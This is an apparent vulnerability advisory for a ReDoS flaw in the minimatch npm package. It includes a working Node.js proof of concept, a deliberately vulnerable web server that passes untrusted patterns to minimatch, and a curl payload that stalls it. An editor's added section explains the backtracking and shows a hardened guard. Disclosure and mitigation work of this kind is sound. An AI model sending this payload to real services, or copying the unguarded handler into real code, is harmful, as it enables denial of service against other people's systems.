📄 minimatch Denial of Service

🗓️ 06 Mar 2026 00:00:00 | Reported by indoushka | Type: packetstorm
🔗 packetstorm.news | 👁 107 Views

Minimatch ReDoS vulnerability: nested *() and +() extglobs are compiled into regular expressions with nested unbounded quantifiers, causing catastrophic backtracking in versions prior to 10.2.3 (and prior to the corresponding fixed releases on older major lines).

Code
=============================================================================================================================================
    | # Title     : minimatch ReDoS Leading to Event Loop                                                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.npmjs.com/package/minimatch                                                                                     |
    =============================================================================================================================================
    
    [+] Summary    :  A critical Regular Expression Denial of Service (ReDoS) vulnerability exists in minimatch prior to the
                      following fixed releases: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5 and 3.1.4.
    
    The issue arises when nested *() or +() extglobs are translated into a JavaScript RegExp containing nested unbounded
    quantifiers, such as (?:(?:a|b)*)*. Such expressions trigger catastrophic backtracking in V8's backtracking regex engine
    (Irregexp): on a non-matching input the engine tries every way of splitting the input between the nested quantifiers
    before it can fail.
    
    A minimal 12-byte pattern, *(*(*(a|b))), combined with an 18-byte non-matching input string is enough to make minimatch()
    stall for over 7 seconds; slightly increasing the nesting depth or the input length pushes the execution time to minutes.
    Absolute timings vary with hardware and Node.js version, but the exponential growth in input length does not.
    
    This vulnerability is particularly severe because:
    
    - it is triggered via the default minimatch() API;
    - no special options are required;
    - the minimum viable exploit pattern is only 12 bytes;
    - both *() and +() extglobs are affected.
    
    [+] POC   :   npm install minimatch@<version prior to 10.2.3>  (the exact version spec did not survive extraction)
                  then run the script below with Node.js 16+ as an ES module (e.g. save it as poc.mjs):
    
    import http from 'node:http';
    import { minimatch } from 'minimatch';
    
    console.log("--- Starting ReDoS Backtracking Test ---");
    
    // Three nested *() extglobs: minimatch compiles this into a RegExp with
    // nested unbounded quantifiers, the shape that backtracks catastrophically.
    const pattern = "*(*(*(a|b)))"; 
    
    // Build a non-matching input (n x 'a' followed by 'z') and time minimatch().
    // The trailing 'z' guarantees failure, so the engine must exhaust every way
    // of splitting the 'a's between the nested quantifiers before giving up.
    const testBacktracking = (n) => {
        const payload = "a".repeat(n) + "z"; 
        const start = performance.now();
        minimatch(payload, pattern); 
        
        const end = performance.now();
        console.log(`[+] Input length (a x ${n}): Took ${(end - start).toFixed(2)}ms`);
    };
    
    // Each additional character multiplies the running time; expect the last
    // call to take seconds on an unpatched version.
    testBacktracking(15);
    testBacktracking(20);
    testBacktracking(23); 
    
    console.log("\n--- Starting Vulnerable Web Server (Port 3000) ---");
    // Deliberately vulnerable: both the pattern and the path are taken verbatim
    // from the query string and handed to minimatch() with default options.
    // One request carrying the pattern above blocks the event loop for every client.
    const server = http.createServer((req, res) => {
        const url = new URL(req.url, `http://localhost:3000`);
        const userPattern = url.searchParams.get('pattern');
        const userPath = url.searchParams.get('path');
    
        if (userPattern && userPath) {
            console.log(`[!] Processing potentially malicious request...`);
            const start = Date.now();
            const result = minimatch(userPath, userPattern);      
            const duration = Date.now() - start;
            res.writeHead(200, { 'Content-Type': 'application/json' });
            res.end(JSON.stringify({ matchResult: result, duration: `${duration}ms` }));
        } else {
            res.writeHead(200, { 'Content-Type': 'text/plain' });
            res.end("Server is running. Send 'pattern' and 'path' parameters to test.");
        }
    });
    
    server.listen(3000, () => {
        console.log("Server is ready! To trigger the DoS, use this curl command:");
        console.log('curl "http://localhost:3000/?pattern=*(*(*(a|b)))&path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaz"');
    });
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
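Added example (editor's code, not part of the advisory above or of the minimatch project). It covers two things the advisory describes but does not show: first, why the nested-quantifier shape `(?:(?:a|b)*)*` backtracks exponentially while a flattened equivalent does not; second, a hardened version of the PoC request handler that refuses untrusted patterns with nested extglobs and caps pattern and path length before any RegExp is compiled. The regexes are hand-written stand-ins for the shape the advisory describes, not minimatch's actual generated source, and the matcher is injected as a parameter (pass `minimatch` from a fixed release) so the file runs with no dependencies. All limits and sample inputs are constructed for this example.

```javascript
// Added example (editor's code, not part of the advisory or the minimatch project).
// The regexes below are hand-written stand-ins for the shape minimatch generates;
// the exact generated source is an assumption, not taken from the library.

// --- Why nested extglobs blow up -------------------------------------------
// Each *( ... ) level adds an unbounded quantifier around an unbounded
// quantifier: *(*(*(a|b))) ends up shaped like ^(?:(?:(?:a|b)*)*)*$ .
function nestedStarRegex(depth) {
  let body = '(?:a|b)';
  for (let i = 0; i < depth; i++) body = `(?:${body})*`;
  return new RegExp(`^${body}$`);
}

// (x*)* accepts exactly the same strings as x*. The nesting changes nothing
// about the language, only the number of ways a backtracking engine can split
// a non-matching input before it gives up, which grows exponentially.
const flatRegex = /^(?:a|b)*$/;

function timeMatch(re, input) {
  const t0 = performance.now();            // global in Node.js >= 16
  const matched = re.test(input);
  return { matched, ms: performance.now() - t0 };
}

// --- Guard for untrusted patterns ------------------------------------------
// Extglobs open with one of * + ? @ ! immediately followed by '(' and close
// with ')'. Backslash escapes are skipped. Bracket expressions are not parsed,
// so a '(' inside [...] may be over-counted; that errs on the safe side.
function maxExtglobDepth(pattern) {
  let depth = 0;
  let max = 0;
  for (let i = 0; i < pattern.length; i++) {
    const c = pattern[i];
    if (c === '\\') { i++; continue; }
    if ('*+?@!'.includes(c) && pattern[i + 1] === '(') {
      depth++;
      if (depth > max) max = depth;
      i++;
    } else if (c === ')' && depth > 0) {
      depth--;
    }
  }
  return max;
}

// Limits are assumptions for this example; tune them for the service.
const LIMITS = { maxPatternLength: 256, maxPathLength: 4096, maxExtglobDepth: 1 };

// Returns null when the request may be passed to the matcher, otherwise a reason.
function checkPattern(pattern, path, limits = LIMITS) {
  if (typeof pattern !== 'string' || typeof path !== 'string') {
    return 'pattern and path must be strings';
  }
  if (pattern.length > limits.maxPatternLength) return 'pattern too long';
  if (path.length > limits.maxPathLength) return 'path too long';
  if (maxExtglobDepth(pattern) > limits.maxExtglobDepth) {
    return 'nested extglobs are not allowed';
  }
  return null;
}

// --- Hardened version of the PoC handler ----------------------------------
// `matcher` is injected (pass minimatch from a fixed release); this keeps the
// file dependency-free. Unsafe input is refused before any RegExp is compiled.
function handleMatch(matcher, pattern, path) {
  const problem = checkPattern(pattern, path);
  if (problem !== null) return { status: 400, body: { error: problem } };
  return { status: 200, body: { matchResult: matcher(path, pattern) } };
}

// Stand-alone demo with constructed inputs. Depth 3 with short inputs keeps the
// run well under a second; lengthening the input reproduces the advisory's stall.
for (const n of [8, 10, 12]) {
  const probe = 'a'.repeat(n) + 'z';
  console.log(`nested depth 3, a x ${n}:`, timeMatch(nestedStarRegex(3), probe));
}
console.log('flat equivalent, a x 10000:', timeMatch(flatRegex, 'a'.repeat(10000) + 'z'));
console.log('guard:', checkPattern('*(*(*(a|b)))', 'aaaz'), '|', checkPattern('*(a|b)', 'aaaz'));
```

In the PoC server above, `handleMatch(minimatch, userPattern, userPath)` would replace the bare `minimatch(userPath, userPattern)` call and map `status` onto `res.writeHead`. The guard is a mitigation for untrusted input, not a substitute for upgrading: a single extglob is still compiled into a RegExp, and the depth limit of 1 is a policy choice, so the only complete fix is a release at or above the versions listed in the summary.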


Vulners AI Score: 5.8 (Medium risk)